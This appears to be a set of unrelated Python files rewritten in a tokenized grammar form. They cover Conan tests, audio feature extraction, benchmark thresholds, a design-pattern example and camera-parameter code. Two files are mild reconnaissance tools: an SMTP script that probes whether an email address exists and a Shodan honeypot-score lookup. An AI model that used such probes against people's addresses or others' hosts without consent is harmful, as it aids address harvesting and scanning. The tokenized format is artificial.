*<block_end><except_stmt>ImportError<block_start><pass><block_end><try_stmt><block_start><import_from_stmt>_heapq _heapreplace_max<block_end><except_stmt>ImportError<block_start><pass><block_end><try_stmt><block_start><import_from_stmt>_heapq _heapify_max<block_end><except_stmt>ImportError<block_start><pass><block_end><try_stmt><block_start><import_from_stmt>_heapq _heappop_max<block_end><except_stmt>ImportError<block_start><pass><block_end><if_stmt>__name__<eq>"__main__"<block_start><import_stmt>doctest<line_sep>print(doctest.testmod())<block_end>
<import_stmt>re<import_stmt>smtplib<import_stmt>dns.resolver<line_sep># Address used for SMTP MAIL FROM command fromAddress='<EMAIL>'<line_sep># Simple Regex for syntax checking regex='^[_a-z0-9-]+(\.[_a-z0-9-]+)*@[a-z0-9-]+(\.[a-z0-9-]+)*(\.[a-z]{2,})$'<line_sep># Email address to verify inputAddress=input('Please enter the emailAddress to verify:')<line_sep>addressToVerify=str(inputAddress)<line_sep># Syntax check match=re.match(regex addressToVerify)<if_stmt>match<eq><none><block_start>print('Bad Syntax')<line_sep><raise>ValueError('Bad Syntax')<block_end># Get domain for DNS lookup splitAddress=addressToVerify.split('@')<line_sep>domain=str(splitAddress[1])<line_sep>print('Domain:' domain)<line_sep># MX record lookup records=dns.resolver.query(domain 'MX')<line_sep>mxRecord=records[0].exchange<line_sep>mxRecord=str(mxRecord)<line_sep># SMTP lib setup (use debug level for full output) server=smtplib.SMTP()<line_sep>server.set_debuglevel(0)<line_sep># SMTP Conversation server.connect(mxRecord)<line_sep>server.helo(server.local_hostname)### server.local_hostname(Get local server hostname) server.mail(fromAddress)<line_sep>code,message=server.rcpt(str(addressToVerify))<line_sep>server.quit()<line_sep>#print(code) #print(message) # Assume SMTP response 250 is success <if_stmt>code<eq>250<block_start>print('Success')<block_end><else_stmt><block_start>print('Bad')<block_end>
<import_stmt>mock<import_stmt>unittest<import_from_stmt>mock Mock<import_from_stmt>parameterized parameterized<import_from_stmt>conans.client tools<import_from_stmt>conans.client.conf.detect detect_defaults_settings<import_from_stmt>conans.paths DEFAULT_PROFILE_NAME<import_from_stmt>conans.test.utils.mocks TestBufferConanOutput<class_stmt>DetectTest(unittest.TestCase)<block_start>@mock.patch("platform.machine" return_value="")<def_stmt>test_detect_empty_arch self _<block_start>result=detect_defaults_settings(output=Mock() profile_path=DEFAULT_PROFILE_NAME)<line_sep>result=dict(result)<line_sep>self.assertTrue("arch"<not><in>result)<line_sep>self.assertTrue("arch_build"<not><in>result)<block_end>@mock.patch("conans.client.conf.detect._gcc_compiler" return_value=("gcc" "8"))<def_stmt>test_detect_custom_profile self _<block_start>output=TestBufferConanOutput()<with_stmt>tools.environment_append({"CC":"gcc"})<block_start>detect_defaults_settings(output profile_path="~/.conan/profiles/mycustomprofile")<line_sep>self.assertIn("conan profile update settings.compiler.libcxx=libstdc++11 "<concat>"mycustomprofile" output)<block_end><block_end>@mock.patch("conans.client.conf.detect._gcc_compiler" return_value=("gcc" "8"))<def_stmt>test_detect_default_profile self _<block_start>output=TestBufferConanOutput()<with_stmt>tools.environment_append({"CC":"gcc"})<block_start>detect_defaults_settings(output profile_path="~/.conan/profiles/default")<line_sep>self.assertIn("conan profile update settings.compiler.libcxx=libstdc++11 default" output)<block_end><block_end>@mock.patch("conans.client.conf.detect._gcc_compiler" return_value=("gcc" "8"))<def_stmt>test_detect_file_profile self _<block_start>output=TestBufferConanOutput()<with_stmt>tools.environment_append({"CC":"gcc"})<block_start>detect_defaults_settings(output profile_path="./MyProfile")<line_sep>self.assertIn("conan profile update settings.compiler.libcxx=libstdc++11 MyProfile" output)<block_end><block_end>@mock.patch("conans.client.conf.detect._gcc_compiler" return_value=("gcc" "8"))<def_stmt>test_detect_abs_file_profile self _<block_start>output=TestBufferConanOutput()<with_stmt>tools.environment_append({"CC":"gcc"})<block_start>detect_defaults_settings(output profile_path="/foo/bar/quz/custom-profile")<line_sep>self.assertIn("conan profile update settings.compiler.libcxx=libstdc++11 "<concat>"custom-profile" output)<block_end><block_end>@parameterized.expand([['powerpc' '64' '7.1.0.0' 'ppc64'] ['powerpc' '32' '7.1.0.0' 'ppc32'] ['rs6000' <none> '4.2.1.0' 'ppc32']])<def_stmt>test_detect_aix self processor bitness version expected_arch<block_start><with_stmt>mock.patch("platform.machine" mock.MagicMock(return_value='XXXXXXXXXXXX')) mock.patch("platform.processor" mock.MagicMock(return_value=processor)) mock.patch("platform.system" mock.MagicMock(return_value='AIX')) mock.patch("conans.client.tools.oss.OSInfo.get_aix_conf" mock.MagicMock(return_value=bitness)) mock.patch('subprocess.check_output' mock.MagicMock(return_value=version))<block_start>result=detect_defaults_settings(output=Mock() profile_path=DEFAULT_PROFILE_NAME)<line_sep>result=dict(result)<line_sep>self.assertEqual("AIX" result['os'])<line_sep>self.assertEqual("AIX" result['os_build'])<line_sep>self.assertEqual(expected_arch result['arch'])<line_sep>self.assertEqual(expected_arch result['arch_build'])<block_end><block_end>@parameterized.expand([['arm64' 'armv8'] ['i386' 'x86'] ['i686' 'x86'] ['i86pc' 'x86'] ['amd64' 'x86_64'] ['aarch64' 'armv8'] ['sun4v' 'sparc']])<def_stmt>test_detect_arch self machine expected_arch<block_start><with_stmt>mock.patch("platform.machine" mock.MagicMock(return_value=machine))<block_start>result=detect_defaults_settings(output=Mock() profile_path=DEFAULT_PROFILE_NAME)<line_sep>result=dict(result)<line_sep>self.assertEqual(expected_arch result['arch'])<line_sep>self.assertEqual(expected_arch result['arch_build'])<block_end><block_end>@mock.patch("conans.client.conf.detect._clang_compiler" return_value=("clang" "9"))<def_stmt>test_detect_clang_gcc_toolchain self _<block_start>output=TestBufferConanOutput()<with_stmt>tools.environment_append({"CC":"clang-9 --gcc-toolchain=/usr/lib/gcc/x86_64-linux-gnu/9"})<block_start>detect_defaults_settings(output profile_path="./MyProfile")<line_sep>self.assertIn("CC and CXX: clang-9 --gcc-toolchain" output)<block_end><block_end><def_stmt>test_vs2022 self<block_start><with_stmt>mock.patch("conans.client.conf.detect._get_default_compiler" mock.MagicMock(return_value=("Visual Studio" "17")))<block_start>result=detect_defaults_settings(output=Mock() profile_path=DEFAULT_PROFILE_NAME)<line_sep>result=dict(result)<line_sep>self.assertEqual('msvc' result['compiler'])<line_sep>self.assertEqual('19.3' result['compiler.version'])<block_end><block_end><block_end>
# -*- coding: utf-8 -*- # Licensed under a 3-clause BSD style license, see LICENSE. """ Module for miscellaneous and general utilities. """<import_from_stmt>.exceptions *<line_sep>
<import_stmt>os<import_stmt>sys<import_stmt>shutil<import_stmt>glob<import_stmt>time<import_stmt>multiprocessing<as>mp<if_stmt>len(sys.argv)<ne>5<block_start>print("Usage: ")<line_sep>print("python extract_features_for_merlin.py <path_to_merlin_dir> <path_to_wav_dir> <path_to_feat_dir> <sampling rate>")<line_sep>sys.exit(1)<block_end># top merlin directory merlin_dir=sys.argv[1]<line_sep># input audio directory wav_dir=sys.argv[2]<line_sep># Output features directory out_dir=sys.argv[3]<line_sep># initializations fs=int(sys.argv[4])<line_sep># tools directory straight=os.path.join(merlin_dir "tools/bin/straight")<line_sep>sptk=os.path.join(merlin_dir "tools/bin/SPTK-3.9")<line_sep>raw_dir=os.path.join(out_dir 'raw')<line_sep>sp_dir=os.path.join(out_dir 'sp')<line_sep>mgc_dir=os.path.join(out_dir 'mgc')<line_sep>bap_dir=os.path.join(out_dir 'bap')<line_sep>ap_dir=os.path.join(out_dir 'ap')<line_sep>f0_dir=os.path.join(out_dir 'f0')<line_sep>lf0_dir=os.path.join(out_dir 'lf0')<if_stmt><not>os.path.exists(out_dir)<block_start>os.mkdir(out_dir)<block_end><if_stmt><not>os.path.exists(raw_dir)<block_start>os.mkdir(raw_dir)<block_end><if_stmt><not>os.path.exists(sp_dir)<block_start>os.mkdir(sp_dir)<block_end><if_stmt><not>os.path.exists(mgc_dir)<block_start>os.mkdir(mgc_dir)<block_end><if_stmt><not>os.path.exists(bap_dir)<block_start>os.mkdir(bap_dir)<block_end><if_stmt><not>os.path.exists(ap_dir)<block_start>os.mkdir(ap_dir)<block_end><if_stmt><not>os.path.exists(f0_dir)<block_start>os.mkdir(f0_dir)<block_end><if_stmt><not>os.path.exists(lf0_dir)<block_start>os.mkdir(lf0_dir)<block_end><if_stmt>fs<eq>16000<block_start>nFFT=1024<line_sep>alpha=0.58<block_end><elif_stmt>fs<eq>48000<block_start>nFFT=4096<line_sep>alpha=0.77<block_end><else_stmt><block_start>print("As of now, we don't support %d Hz sampling rate."%(fs))<line_sep>print("Please consider either downsampling to 16000 Hz or upsampling to 48000 Hz")<line_sep>sys.exit(1)<block_end>mcsize=59<line_sep>order=24<line_sep>nFFTHalf=1+nFFT/2<line_sep>fshift=5<def_stmt>get_wav_filelist wav_dir<block_start>wav_files=[]<for_stmt>file os.listdir(wav_dir)<block_start>whole_filepath=os.path.join(wav_dir file)<if_stmt>os.path.isfile(whole_filepath)<and>str(whole_filepath).endswith(".wav")<block_start>wav_files.append(whole_filepath)<block_end><elif_stmt>os.path.isdir(whole_filepath)<block_start>wav_files<augadd>get_wav_filelist(whole_filepath)<block_end><block_end>wav_files.sort()<line_sep><return>wav_files<block_end><def_stmt>process filename<block_start>''' The function decomposes a wav file into F0, mel-cepstral coefficients, and band aperiodicity :param filename: path to wav file :return: .lf0, .mgc and .bap files '''<line_sep>file_id=os.path.basename(filename).split(".")[0]<line_sep>print(file_id)<line_sep>sox_wav_2_raw_cmd='sox %s -b 16 -c 1 -r %s -t raw %s'%(filename fs os.path.join(raw_dir file_id+'.raw'))<line_sep>os.system(sox_wav_2_raw_cmd)<line_sep>### STRAIGHT ANALYSIS -- extract vocoder parameters ### ### extract f0, sp, ap ### straight_f0_analysis_cmd="%s -nmsg -maxf0 400 -uf0 400 -minf0 50 -lf0 50 -f0shift %s -f %s -raw %s %s"%(os.path.join(straight 'tempo') fshift fs os.path.join(raw_dir file_id+'.raw') os.path.join(f0_dir file_id+'.f0'))<line_sep>os.system(straight_f0_analysis_cmd)<line_sep>straight_ap_analysis_cmd="%s -nmsg -f %s -fftl %s -apord %s -shift %s -f0shift %s -float -f0file %s -raw %s %s"%(os.path.join(straight 'straight_bndap') fs nFFT nFFTHalf fshift fshift os.path.join(f0_dir file_id+'.f0') os.path.join(raw_dir file_id+'.raw') os.path.join(ap_dir file_id+'.ap'))<line_sep>os.system(straight_ap_analysis_cmd)<line_sep>straight_sp_analysis_cmd="%s -nmsg -f %s -fftl %s -apord %s -shift %s -f0shift %s -order %s -f0file %s -pow -float -raw %s %s"%(os.path.join(straight 'straight_mcep') fs nFFT nFFTHalf fshift fshift mcsize os.path.join(f0_dir file_id+'.f0') os.path.join(raw_dir file_id+'.raw') os.path.join(sp_dir file_id+'.sp'))<line_sep>os.system(straight_sp_analysis_cmd)<line_sep>### convert f0 to lf0 ### sptk_x2x_af_cmd="%s +af %s | %s > %s "%(os.path.join(sptk 'x2x') os.path.join(f0_dir file_id+'.f0') os.path.join(sptk 'sopr')+' -magic 0.0 -LN -MAGIC -1.0E+10' os.path.join(lf0_dir file_id+'.lf0'))<line_sep>os.system(sptk_x2x_af_cmd)<line_sep>### convert sp to mgc ### sptk_mcep="%s -a %s -m %s -l %s -e 1.0E-8 -j 0 -f 0.0 -q 3 %s > %s"%(os.path.join(sptk 'mcep') alpha mcsize nFFT os.path.join(sp_dir file_id+'.sp') os.path.join(mgc_dir file_id+'.mgc'))<line_sep>os.system(sptk_mcep)<line_sep>### convert ap to bap ### sptk_mcep="%s -a %s -m %s -l %s -e 1.0E-8 -j 0 -f 0.0 -q 1 %s > %s"%(os.path.join(sptk 'mcep') alpha order nFFT os.path.join(ap_dir file_id+'.ap') os.path.join(bap_dir file_id+'.bap'))<line_sep>os.system(sptk_mcep)<block_end>print("--- Feature extraction started ---")<line_sep>start_time=time.time()<line_sep># get wav files list wav_files=get_wav_filelist(wav_dir)<line_sep># do multi-processing pool=mp.Pool(mp.cpu_count())<line_sep>pool.map(process wav_files)<line_sep># clean temporal files shutil.rmtree(raw_dir ignore_errors=<true>)<line_sep>shutil.rmtree(sp_dir ignore_errors=<true>)<line_sep>shutil.rmtree(f0_dir ignore_errors=<true>)<line_sep>shutil.rmtree(ap_dir ignore_errors=<true>)<line_sep>print("You should have your features ready in: "+out_dir)<line_sep>(m s)=divmod(int(time.time()-start_time) 60)<line_sep>print(("--- Feature extraction completion time: %d min. %d sec ---"%(m s)))<line_sep>
#Developer by Bafomet # -*- coding: utf-8 -*- <import_stmt>requests<import_from_stmt>settings shodan_api<line_sep># color R="\033[31m"# Red G="\033[1;34m"# Blue C="\033[1;32m"# Green W="\033[0m"# white O="\033[45m"# Purple <def_stmt>honeypot inp<block_start>url=f"https://api.shodan.io/labs/honeyscore/{inp}"<try_stmt><block_start>result=requests.get(url params={"key":shodan_api}).text<block_end><except_stmt><block_start>print(f"\nНет доступной информации!")<line_sep><return><block_end><if_stmt>"error"<in>result<or>"404"<in>result<block_start>print("IP не найден")<line_sep><return><block_end><elif_stmt>result<block_start>probability=str(float(result)<times>10)<line_sep>print(f"{G} [ + ]{R} Вероятность что это Honeypot : {probability}%")<line_sep>print()<line_sep>print(f"{G} На Shodan проверил, там тоже пусто.")<block_end><else_stmt><block_start>print(" Что-то пошло не так ")<block_end><block_end>
"""Clean Code in Python - Chapter 9: Common Design Patterns > State """<import_stmt>abc<import_from_stmt>log logger<import_from_stmt>state_1 InvalidTransitionError<class_stmt>MergeRequestState(abc.ABC)<block_start><def_stmt>__init__ self merge_request<block_start>self._merge_request=merge_request<block_end>@abc.abstractmethod<def_stmt>open self<block_start><ellipsis><block_end>@abc.abstractmethod<def_stmt>close self<block_start><ellipsis><block_end>@abc.abstractmethod<def_stmt>merge self<block_start><ellipsis><block_end><def_stmt>__str__ self<block_start><return>self.__class__.__name__<block_end><block_end><class_stmt>Open(MergeRequestState)<block_start><def_stmt>open self<block_start>self._merge_request.approvals=0<block_end><def_stmt>close self<block_start>self._merge_request.approvals=0<line_sep>self._merge_request.state=Closed<block_end><def_stmt>merge self<block_start>logger.info("merging %s" self._merge_request)<line_sep>logger.info("deleting branch %s" self._merge_request.source_branch)<line_sep>self._merge_request.state=Merged<block_end><block_end><class_stmt>Closed(MergeRequestState)<block_start><def_stmt>open self<block_start>logger.info("reopening closed merge request %s" self._merge_request)<line_sep>self._merge_request.state=Open<block_end><def_stmt>close self<block_start>"""Current state."""<block_end><def_stmt>merge self<block_start><raise>InvalidTransitionError("can't merge a closed request")<block_end><block_end><class_stmt>Merged(MergeRequestState)<block_start><def_stmt>open self<block_start><raise>InvalidTransitionError("already merged request")<block_end><def_stmt>close self<block_start><raise>InvalidTransitionError("already merged request")<block_end><def_stmt>merge self<block_start>"""Current state."""<block_end><block_end><class_stmt>MergeRequest<block_start><def_stmt>__init__ self source_branch:str target_branch:str<arrow><none><block_start>self.source_branch=source_branch<line_sep>self.target_branch=target_branch<line_sep>self._state:MergeRequestState<line_sep>self.approvals=0<line_sep>self.state=Open<block_end>@property<def_stmt>state self<block_start><return>self._state<block_end>@state.setter<def_stmt>state self new_state_cls<block_start>self._state=new_state_cls(self)<block_end>@property<def_stmt>status self<block_start><return>str(self.state)<block_end><def_stmt>__getattr__ self method<block_start><return>getattr(self.state method)<block_end><def_stmt>__str__ self<block_start><return>f"{self.target_branch}:{self.source_branch}"<block_end><block_end>
# MIT licensed # Copyright (c) 2013-2020 lilydjwg <<EMAIL>>, et al. <import_stmt>pytest<line_sep>pytestmark=[pytest.mark.asyncio pytest.mark.needs_net]<async_keyword><def_stmt>test_gitlab get_version<block_start>ver=<await>get_version("example" {"source":"gitlab" "gitlab":"gitlab-org/gitlab-test" })<assert_stmt>len(ver)<eq>8<assert_stmt>ver.isdigit()<block_end><async_keyword><def_stmt>test_gitlab_blm get_version# repo with a custom main branch <block_start>ver=<await>get_version("example" {"source":"gitlab" "gitlab":"asus-linux/asusctl" })<assert_stmt>len(ver)<eq>8<assert_stmt>ver.isdigit()<block_end><async_keyword><def_stmt>test_gitlab_max_tag get_version<block_start><assert_stmt><await>get_version("example" {"source":"gitlab" "gitlab":"gitlab-org/gitlab-test" "use_max_tag":<true> })<eq>"v1.1.1"<block_end><async_keyword><def_stmt>test_gitlab_max_tag_with_include get_version<block_start><assert_stmt><await>get_version("example" {"source":"gitlab" "gitlab":"gitlab-org/gitlab-test" "use_max_tag":<true> "include_regex":r'v1\.0.*' })<eq>"v1.0.0"<block_end><async_keyword><def_stmt>test_gitlab_max_tag_with_ignored get_version<block_start><assert_stmt><await>get_version("example" {"source":"gitlab" "gitlab":"gitlab-org/gitlab-test" "use_max_tag":<true> "ignored":"v1.1.0 v1.1.1" })<eq>"v1.0.0"<block_end>
# Generated by Django 3.1 on 2020-08-05 13:09 <import_from_stmt>django.db migrations models<class_stmt>Migration(migrations.Migration)<block_start>dependencies=[('website' '0012_service') ('users' '0002_alter_user_first_name') ]<line_sep>operations=[migrations.AddField(model_name='user' name='services' field=models.ManyToManyField(to='website.Service') ) ]<block_end>
<import_from_stmt>packaging.specifiers SpecifierSet<import_from_stmt>packaging.version Version<line_sep># TensorFlow # Throughput, unit: images/second TENSORFLOW_TRAINING_CPU_SYNTHETIC_THRESHOLD={"<2.0":50 ">=2.0":50}<line_sep>TENSORFLOW_TRAINING_GPU_SYNTHETIC_THRESHOLD={"<2.0":5000 ">=2.0":7000}<line_sep>TENSORFLOW_TRAINING_GPU_IMAGENET_THRESHOLD={"<2.0":5000 ">=2.0":7000}<line_sep># p99 latency, unit: second TENSORFLOW_INFERENCE_CPU_THRESHOLD={"<2.0":{"INCEPTION":0.06 "RCNN-Resnet101-kitti":0.65 "Resnet50v2":0.35 "MNIST":0.00045 "SSDResnet50Coco":0.4 } ">=2.0,<2.4":{"INCEPTION":0.06 "RCNN-Resnet101-kitti":0.65 "Resnet50v2":0.35 "MNIST":0.00045 "SSDResnet50Coco":0.4 } # Updated thresholds for TF 2.4.1 CPU from Vanilla TF 2.4 ">=2.4":{"INCEPTION":0.11 "RCNN-Resnet101-kitti":2.1 "Resnet50v2":0.35 "MNIST":0.001 "SSDResnet50Coco":1.2 } }<line_sep>TENSORFLOW_INFERENCE_GPU_THRESHOLD={"<2.0":{"INCEPTION":0.04 "RCNN-Resnet101-kitti":0.06 "Resnet50v2":0.014 "MNIST":0.0024 "SSDResnet50Coco":0.1 } ">=2.0":{"INCEPTION":0.04 "RCNN-Resnet101-kitti":0.06 "Resnet50v2":0.014 "MNIST":0.0024 "SSDResnet50Coco":0.1 } }<line_sep># Throughput, unit: images/second TENSORFLOW_SM_TRAINING_CPU_1NODE_THRESHOLD={">=2.0":30}<line_sep>TENSORFLOW_SM_TRAINING_CPU_4NODE_THRESHOLD={">=2.0":20}<line_sep>TENSORFLOW_SM_TRAINING_GPU_1NODE_THRESHOLD={">=2.0":2500}<line_sep>TENSORFLOW_SM_TRAINING_GPU_4NODE_THRESHOLD={">=2.0":2500}<line_sep># MXNet # Throughput, unit: images/second MXNET_TRAINING_CPU_CIFAR_THRESHOLD={">=1.0":1000}<line_sep>MXNET_TRAINING_GPU_IMAGENET_THRESHOLD={">=1.0":4500}<line_sep>MXNET_INFERENCE_CPU_IMAGENET_THRESHOLD={">=1.0":100}<line_sep>MXNET_INFERENCE_GPU_IMAGENET_THRESHOLD={">=1.0":4500}<line_sep># Accuracy, unit: NA MXNET_TRAINING_GPU_IMAGENET_ACCURACY_THRESHOLD={">=1.0":0.9}<line_sep># Latency, unit: sec/epoch MXNET_TRAINING_GPU_IMAGENET_LATENCY_THRESHOLD={">=1.0":120}<line_sep># PyTorch # Throughput, unit: images/second PYTORCH_TRAINING_GPU_SYNTHETIC_THRESHOLD={">=1.0":2400}<line_sep># Training Time Cost, unit: second/epoch PYTORCH_TRAINING_GPU_IMAGENET_THRESHOLD={">=1.0":660}<line_sep># p99 latency, unit: millisecond PYTORCH_INFERENCE_CPU_THRESHOLD={">=1.0":{"ResNet18":0.08 "VGG13":0.45 "MobileNetV2":0.06 "GoogleNet":0.12 "DenseNet121":0.15 "InceptionV3":0.25 }}<line_sep>PYTORCH_INFERENCE_GPU_THRESHOLD={">=1.0":{"ResNet18":0.0075 "VGG13":0.004 "MobileNetV2":0.013 "GoogleNet":0.018 "DenseNet121":0.04 "InceptionV3":0.03 }}<def_stmt>get_threshold_for_image framework_version lookup_table<block_start>""" Find the correct threshold value(s) for a given framework version and a dict from which to lookup values. :param framework_version: Framework version of the image being tested :param lookup_table: The relevant dict from one of the dicts defined in this script :return: Threshold value as defined by one of the dicts in this script """<for_stmt>spec,threshold_val lookup_table.items()<block_start><if_stmt>Version(framework_version)<in>SpecifierSet(spec)<block_start><return>threshold_val<block_end><block_end><raise>KeyError(f"{framework_version} does not satisfy any version constraint available in "<concat>f"{lookup_table.keys()}")<block_end>
<import_stmt>h2o<line_sep>h2o.init()<line_sep>weather_hex=h2o.import_file("http://h2o-public-test-data.s3.amazonaws.com/smalldata/junit/weather.csv")<line_sep># Get a summary of the data weather_hex.describe()<line_sep>
<import_stmt>json<import_stmt>warnings<import_from_stmt>enum Enum<import_from_stmt>typing Any List Tuple Union<import_stmt>numpy<as>np<import_stmt>torch<import_from_stmt>mmhuman3d.core.cameras.cameras PerspectiveCameras<import_from_stmt>mmhuman3d.core.conventions.cameras.convert_convention convert_camera_matrix convert_K_3x3_to_4x4 convert_K_4x4_to_3x3 <import_from_stmt>.builder build_cameras<line_sep>_CAMERA_PARAMETER_SUPPORTED_KEYS_={'H':{'type':int } 'W':{'type':int } 'in_mat':{'type':list 'len':3 } 'rotation_mat':{'type':list 'len':3 } 'translation':{'type':list 'len':3 } 'k1':{'type':float } 'k2':{'type':float } 'k3':{'type':float } 'k4':{'type':float } 'k5':{'type':float } 'k6':{'type':float } 'p1':{'type':float } 'p2':{'type':float } }<class_stmt>_TypeValidation(Enum)<block_start>MATCH=0<line_sep>ARRAY=1<line_sep>FAIL=2<block_end><class_stmt>CameraParameter<block_start>logger=<none><line_sep>SUPPORTED_KEYS=_CAMERA_PARAMETER_SUPPORTED_KEYS_<def_stmt>__init__ self name:str='default' H:int=1080 W:int=1920<arrow><none><block_start>""" Args: name (str, optional): Name of this camera. Defaults to "default". H (int, optional): Height of a frame, in pixel. Defaults to 1080. W (int, optional): Width of a frame, in pixel. Defaults to 1920. """<line_sep>self.name=name<line_sep>self.parameters_dict={}<line_sep>in_mat=__zero_mat_list__(3)<line_sep>self.parameters_dict['in_mat']=in_mat<for_stmt>distort_name __distort_coefficient_names__<block_start>self.parameters_dict[distort_name]=0.0<block_end>_,H=self.validate_item('H' H)<line_sep>self.parameters_dict['H']=H<line_sep>_,W=self.validate_item('W' W)<line_sep>self.parameters_dict['W']=W<line_sep>r_mat=__zero_mat_list__(3)<line_sep>self.parameters_dict['rotation_mat']=r_mat<line_sep>t_list=[0.0 0.0 0.0]<line_sep>self.parameters_dict['translation']=t_list<block_end><def_stmt>reset_distort self<arrow><none><block_start>"""Reset all distort coefficients to zero."""<for_stmt>distort_name __distort_coefficient_names__<block_start>self.parameters_dict[distort_name]=0.0<block_end><block_end><def_stmt>get_opencv_distort_mat self<arrow>np.ndarray<block_start>"""Get a numpy array of 8 distort coefficients, which is the distCoeffs arg of cv2.undistort. Returns: ndarray: (k_1, k_2, p_1, p_2, k_3, k_4, k_5, k_6) of 8 elements. """<line_sep>dist_coeffs=[self.get_value('k1') self.get_value('k2') self.get_value('p1') self.get_value('p2') self.get_value('k3') self.get_value('k4') self.get_value('k5') self.get_value('k6') ]<line_sep>dist_coeffs=np.array(dist_coeffs)<line_sep><return>dist_coeffs<block_end><def_stmt>set_KRT self K_mat:np.ndarray R_mat:np.ndarray T_vec:np.ndarray inverse_extrinsic:bool=<false><arrow><none><block_start>"""Set intrinsic and extrinsic of a camera. Args: K_mat (np.ndarray): In shape [3, 3]. R_mat (np.ndarray): Rotation from world to view in default. In shape [3, 3]. T_vec (np.ndarray): Translation from world to view in default. In shape [3,]. inverse_extrinsic (bool, optional): If true, R_mat and T_vec transform a point from view to world. Defaults to False. """<line_sep>k_shape=K_mat.shape<assert_stmt>k_shape[0]<eq>k_shape[1]<eq>3<line_sep>r_shape=R_mat.shape<assert_stmt>r_shape[0]<eq>r_shape[1]<eq>3<assert_stmt>T_vec.ndim<eq>1<and>T_vec.shape[0]<eq>3<line_sep>self.set_mat_np('in_mat' K_mat)<if_stmt>inverse_extrinsic<block_start>R_mat=np.linalg.inv(R_mat)<line_sep>T_vec=-np.dot(R_mat T_vec).reshape((3))<block_end>self.set_mat_np('rotation_mat' R_mat)<line_sep>self.set_value('translation' T_vec.tolist())<block_end><def_stmt>get_KRT self k_dim=3<arrow>List[np.ndarray]<block_start>"""Get intrinsic and extrinsic of a camera. Args: k_dim (int, optional): Dimension of the returned mat K. Defaults to 3. Raises: ValueError: k_dim is neither 3 nor 4. Returns: List[np.ndarray]: K_mat (np.ndarray): In shape [3, 3]. R_mat (np.ndarray): Rotation from world to view in default. In shape [3, 3]. T_vec (np.ndarray): Translation from world to view in default. In shape [3,]. """<line_sep>K_3x3=self.get_mat_np('in_mat')<line_sep>R_mat=self.get_mat_np('rotation_mat')<line_sep>T_vec=np.asarray(self.get_value('translation'))<if_stmt>k_dim<eq>3<block_start><return>[K_3x3 R_mat T_vec]<block_end><elif_stmt>k_dim<eq>4<block_start>K_3x3=np.expand_dims(K_3x3 0)# shape (1, 3, 3) K_4x4=convert_K_3x3_to_4x4(K=K_3x3 is_perspective=<true>)<line_sep># shape (1, 4, 4) K_4x4=K_4x4[0 : :]<line_sep><return>[K_4x4 R_mat T_vec]<block_end><else_stmt><block_start><raise>ValueError(f'K mat cannot be converted to {k_dim}x{k_dim}')<block_end><block_end><def_stmt>set_mat_np self mat_key:str mat_numpy:np.ndarray<arrow><none><block_start>"""Set a matrix-type parameter to mat_numpy. Args: mat_key (str): Key of the target matrix. in_mat or rotation_mat. mat_numpy (ndarray): Matrix in numpy format. Raises: TypeError: mat_numpy is not an np.ndarray. """<if_stmt><not>isinstance(mat_numpy np.ndarray)<block_start><raise>TypeError<block_end>self.set_mat_list(mat_key mat_numpy.tolist())<block_end><def_stmt>set_mat_list self mat_key:str mat_list:List[list]<arrow><none><block_start>"""Set a matrix-type parameter to mat_list. Args: mat_key (str): Key of the target matrix. in_mat or rotation_mat. mat_list (List[list]): Matrix in list format. """<line_sep>_,mat_list=self.validate_item(mat_key mat_list)<line_sep>self.parameters_dict[mat_key]=mat_list<block_end><def_stmt>set_value self key:str value:Any<arrow><none><block_start>"""Set a parameter to value. Args: key (str): Name of the parameter. value (object): New value of the parameter. """<line_sep>_,value=self.validate_item(key value)<line_sep>self.parameters_dict[key]=value<block_end><def_stmt>get_value self key:str<arrow>Any<block_start>"""Get a parameter by key. Args: key (str): Name of the parameter. Raises: KeyError: key not in self.parameters_dict Returns: object: Value of the parameter. """<if_stmt>key<not><in>self.parameters_dict<block_start><raise>KeyError(key)<block_end><else_stmt><block_start><return>self.parameters_dict[key]<block_end><block_end><def_stmt>get_mat_np self key:str<arrow>np.ndarray<block_start>"""Get a a matrix-type parameter by key. Args: key (str): Name of the parameter. Raises: KeyError: key not in self.parameters_dict Returns: ndarray: Value of the parameter. """<if_stmt>key<not><in>self.parameters_dict<block_start><raise>KeyError(key)<block_end><else_stmt><block_start>mat_list=self.parameters_dict[key]<line_sep>mat_np=np.array(mat_list).reshape((3 3))<line_sep><return>mat_np<block_end><block_end><def_stmt>to_string self<arrow>str<block_start>"""Convert self.to_dict() to a string. Returns: str: A dict in json string format. """<line_sep>dump_dict=self.to_dict()<line_sep>ret_str=json.dumps(dump_dict)<line_sep><return>ret_str<block_end><def_stmt>to_dict self<arrow>dict<block_start>"""Dump camera name and parameters to dict. Returns: dict: Put self.name and self.parameters_dict in one dict. """<line_sep>dump_dict=self.parameters_dict.copy()<line_sep>dump_dict['name']=self.name<line_sep><return>dump_dict<block_end><def_stmt>dump self json_path:str<arrow><none><block_start>"""Dump camera name and parameters to a file. Returns: dict: Put self.name and self.parameters_dict in one dict, and dump them to a json file. """<line_sep>dump_dict=self.to_dict()<with_stmt>open(json_path 'w')<as>f_write<block_start>json.dump(dump_dict f_write)<block_end><block_end><def_stmt>load self json_path:str<arrow><none><block_start>"""Load camera name and parameters from a file."""<with_stmt>open(json_path 'r')<as>f_read<block_start>dumped_dict=json.load(f_read)<block_end>self.load_from_dict(dumped_dict)<block_end><def_stmt>load_from_dict self json_dict:dict<arrow><none><block_start>"""Load name and parameters from a dict. Args: json_dict (dict): A dict comes from self.to_dict(). """<for_stmt>key json_dict.keys()<block_start><if_stmt>key<eq>'name'<block_start>self.name=json_dict[key]<block_end><elif_stmt>key<eq>'rotation'<block_start>self.parameters_dict['rotation_mat']=np.array(json_dict[key]).reshape(3 3).tolist()<block_end><elif_stmt>key<eq>'translation'<block_start>self.parameters_dict[key]=np.array(json_dict[key]).reshape((3)).tolist()<block_end><else_stmt><block_start>self.parameters_dict[key]=json_dict[key]<if_stmt>'_mat'<in>key<block_start>self.parameters_dict[key]=np.array(self.parameters_dict[key]).reshape(3 3).tolist()<block_end><block_end><block_end><block_end><def_stmt>load_from_chessboard self chessboard_dict:dict name:str inverse:bool=<true><arrow><none><block_start>"""Load name and parameters from a dict. Args: chessboard_dict (dict): A dict loaded from json.load(chessboard_file). name (str): Name of this camera. inverse (bool, optional): Whether to inverse rotation and translation mat. Defaults to False. """<line_sep>camera_param_dict=__parse_chessboard_param__(chessboard_dict name inverse=inverse)<line_sep>self.load_from_dict(camera_param_dict)<block_end><def_stmt>load_kinect_from_smc self smc_reader kinect_id:int<arrow><none><block_start>"""Load name and parameters of a kinect from an SmcReader instance. Args: smc_reader (mmhuman3d.data.data_structures.smc_reader.SMCReader): An SmcReader instance containing kinect camera 